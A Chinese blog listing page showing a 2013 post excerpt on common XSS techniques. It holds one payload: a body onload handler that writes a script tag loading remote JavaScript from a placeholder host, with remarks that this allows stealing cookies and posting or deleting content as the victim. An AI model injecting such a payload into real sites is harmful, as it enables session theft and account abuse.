会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
ヽ坚强的蘑菇
博客园
首页
新随笔
联系
管理
订阅
2013年4月28日
XSS 常见手段
摘要: <body onload="document.write('<script src=http://xxx.com/js/main.js></script>')"> 加载一段远程的JS 里面的代码自由发挥可以盗取cookie 模拟用户发帖 发文章 删除文章 基本上 只要你想到的 多可以做到
阅读全文
posted @ 2013-04-28 14:20 ヽ坚强的蘑菇
阅读(194)
评论(0)
推荐(0)
编辑
公告